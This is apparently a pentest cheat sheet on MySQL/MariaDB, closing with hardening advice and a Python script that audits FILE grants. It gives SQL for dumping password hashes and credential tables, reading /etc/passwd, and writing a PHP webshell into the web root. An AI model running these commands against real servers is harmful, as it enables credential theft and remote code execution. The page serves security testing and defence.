MySQL / MariaDB

Relational database on 3306. The FILE privilege turns SQL access into arbitrary file read/write, app config files leak its credentials, and those creds are often reused for OS logins.

Ports

Port | Proto | Notes
3306 | tcp | MySQL / MariaDB

Fingerprint

  • Banner reveals version (e.g. 5.7.x, 10.x MariaDB)
  • nmap mysql-info script

Key files

Path | Holds | Sensitive
/etc/mysql/my.cnf | server config, sometimes inline creds | sensitive
~/.my.cnf | cached client credentials | sensitive
/var/lib/mysql/ | data directory (raw tables) |
app configs (wp-config.php, freepbx.conf, config.php) | DB user/password reused elsewhere | sensitive

Default / weak creds

  • root / (blank on old installs)
  • app DB users found in web config files

Service users

mysql

Known CVEs

CVE | Impact
CVE-2012-2122 | Authentication bypass via repeated login (memcmp timing)

Exploitation primitives

  • FILE privilege: LOAD_FILE() reads files, SELECT ... INTO OUTFILE/DUMPFILE writes a webshell to the web root
  • UDF code execution when FILE plus a writable plugin directory exist
  • Crack mysql_native_password hashes, or reuse the DB password for SSH / su

Overview

MySQL/MariaDB on 3306 is both a data target and a file primitive. The FILE privilege is the big one: it converts a SQL injection or a valid login into arbitrary read/write on disk.

Enumeration

Connect:

mysql -h <TARGET> -u root -p

Check your grants (look for FILE):

SELECT user(); SHOW GRANTS;

Check where OUTFILE is allowed to write:

SELECT @@secure_file_priv;

Dump MySQL’s own account hashes (crack offline):

SELECT user,authentication_string FROM mysql.user;

Find application credential tables (names vary per app):

SELECT table_schema,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%';

Then dump whichever users/credentials table you found:

SELECT * FROM <db>.<table>;

File primitive

SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_GET["c"]);?>' INTO OUTFILE '/var/www/html/s.php';

Hardening

Drop FILE from app accounts, set secure_file_priv, and never reuse DB passwords for OS accounts.
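
One way to check the first two hardening points from collected SHOW GRANTS output and the @@secure_file_priv value, as an added example that is not part of the original page. The function names, severity labels and sample grant lines are constructed for illustration, and the secure_file_priv interpretation assumes MySQL's documented semantics (NULL disables, empty string is unrestricted).

```python
import re

# One line of SHOW GRANTS output: GRANT <privs> ON <scope> TO <account> ...
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<acct>\S+)", re.I)

# Severity of a FILE grant per secure_file_priv state (labels are this example's own)
SEVERITY = {"unrestricted": "high", "confined": "medium", "disabled": "low"}

def file_holders(grant_lines):
    """Accounts whose global (*.*) grants include FILE, directly or via ALL."""
    holders = []
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m["scope"] != "*.*":  # FILE can only be granted globally
            continue
        privs = {p.strip().upper() for p in m["privs"].split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            acct = m["acct"].replace("`", "'")  # normalise backtick quoting
            if acct not in holders:
                holders.append(acct)
    return holders

def secure_file_priv_state(value):
    """Assumed MySQL semantics: NULL (None) disables file import/export,
    '' leaves it unrestricted, a path confines it to that directory."""
    if value is None:
        return "disabled"
    return "unrestricted" if value == "" else "confined"

def audit(grant_lines, secure_file_priv):
    """Return (account, severity, fix) for every account holding FILE."""
    sev = SEVERITY[secure_file_priv_state(secure_file_priv)]
    return [(a, sev, f"REVOKE FILE ON *.* FROM {a};")
            for a in file_holders(grant_lines)]

# Constructed sample input, not taken from a real server
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO `report`@`%`",
    "GRANT SELECT ON `shop`.* TO `report`@`%`",
    "GRANT SELECT, INSERT, FILE ON *.* TO `webapp`@`localhost`",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_GRANTS, ""):
        print(*finding, sep=" | ")
```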
